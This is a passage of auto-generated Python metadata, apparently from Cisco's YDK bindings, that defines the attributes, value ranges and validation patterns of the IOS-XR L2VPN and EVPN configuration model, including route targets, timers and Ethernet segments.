_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable flow load balancing on l2vpn bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVI Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
''' whether RT is Stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary,secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
